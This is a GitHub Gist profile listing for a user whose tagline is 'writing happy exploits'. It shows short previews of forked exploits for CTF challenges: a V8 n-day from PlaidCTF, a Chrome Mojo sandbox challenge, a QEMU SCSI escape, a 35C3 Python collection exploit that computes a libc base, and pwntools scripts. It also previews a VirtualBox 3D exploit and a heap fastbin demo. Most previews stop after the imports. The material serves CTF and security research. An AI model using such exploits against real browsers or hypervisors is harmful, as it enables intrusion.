Skip to content

Instantly share code, notes, and snippets.

Avatar
😸
writing happy exploits

Duc Phan ducphanduyagentp

😸
writing happy exploits
View GitHub Profile
View 3_years_of_attacking_javascript_engines.txt
|=-----------------------------------------------------------------------=|
|=-------------=[ 3 Years of Attacking JavaScript Engines ]=-------------=|
|=-----------------------------------------------------------------------=|
|=------------------------------=[ saelo ]=------------------------------=|
|=-----------------------------------------------------------------------=|
The following are some brief notes about the changes that have taken place
since the release of the "Attacking JavaScript Engines" paper [1]. In
general, no big conceptional changes have happened since. Mitigations have
been added to break some of the presented techniques and, as expected, a
View virtualbox_3d_exp.py
# Author : peternguyen93
import sys
sys.path.append('../') # back to vboxlib module
from vboxlib.hgcm import *
from vboxlib.chromium import *
from ctypes import *
'''
@ducphanduyagentp
ducphanduyagentp / exploit.html
Created Jun 24, 2019 — forked from ujin5/exploit.html
Google CTF Quals 2019 Monochromatic
View exploit.html
<html>
<pre id='log'></pre>
<script src="mojo_bindings.js"></script>
<script src="third_party/blink/public/mojom/blob/blob_registry.mojom.js"></script>
<script src="being_creator_interface.mojom.js"></script>
<script src="food_interface.mojom.js"></script>
<script src="dog_interface.mojom.js"></script>
<script src="person_interface.mojom.js"></script>
<script src="cat_interface.mojom.js"></script>
<script>
@ducphanduyagentp
ducphanduyagentp / exp.py
Created May 13, 2019 — forked from hama7230/exp.py
DEF CON CTF Qualifier 2019 speedrun-012
View exp.py
#!/usr/bin/env python
from pwn import *
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# context(terminal=['tmux', 'new-window']) # open new window
# libc = ELF('')
elf = ELF('./speedrun-012')
context(os='linux', arch=elf.arch)
context(log_level='debug') # output verbose log
@ducphanduyagentp
ducphanduyagentp / exploit.c
Created Feb 17, 2019 — forked from sampritipanda/exploit.c
Real World CTF - SCSI Driver Exploitation Challenge
View exploit.c
#include <stdint.h>
#include <sys/io.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <string.h>
#include <assert.h>
#include "virt_to_phys.c"
@ducphanduyagentp
ducphanduyagentp / pwn.js
Created Jan 10, 2019 — forked from saelo/pwn.js
Exploit for the "roll a d8" challenge of PlaidCTF 2018
View pwn.js
//
// Quick and dirty exploit for the "roll a d8" challenge of PlaidCTF 2018.
// N-day exploit for https://chromium.googlesource.com/v8/v8/+/b5da57a06de8791693c248b7aafc734861a3785d
//
// Scroll down do "BEGIN EXPLOIT" to skip the utility functions.
//
// Copyright (c) 2018 Samuel Groß
//
//
View keybase.md

Keybase proof

I hereby claim:

  • I am ducphanduyagentp on github.
  • I am dphan0x80 (https://keybase.io/dphan0x80) on keybase.
  • I have a public key whose fingerprint is 3796 106E F244 F6C6 EE39 09B3 07A6 7A8D 5C67 96C2

To claim this, I am signing this object:

View fastbin.c
#include <stdio.h>
#include <stdlib.h>
#define chunksize 0x8
#define fakesize 0x20
#define SIZE_SZ (sizeof(size_t))
#define MALLOC_ALIGN_MASK (2*SIZE_SZ - 1)
#define MIN_CHUNK_SIZE 24 /* 64 bit system */
//#define MIN_CHUNK_SIZE 12 /* 32 bit system */
View gist:5ca684664ab979e2660a0302806edce9
#!/usr/bin/env python
#-*- coding: utf-8 -*-
from pwn import *
import re
import sys
import string
import itertools
# UAF in IndexCursor
@ducphanduyagentp
ducphanduyagentp / exp.py
Created Dec 30, 2018 — forked from hama7230/exp.py
35C3 CTF collection
View exp.py
# import Collection
bytearray = ().__class__.__base__.__subclasses__()[5]
def p64(addr):
x = '{0:016x}'.format(addr)
return bytearray.fromhex(x)[::-1]
b = Collection.Collection({'1':0x1337})
libc_base = id(b) + 0xe27198 - 0x13e0dd0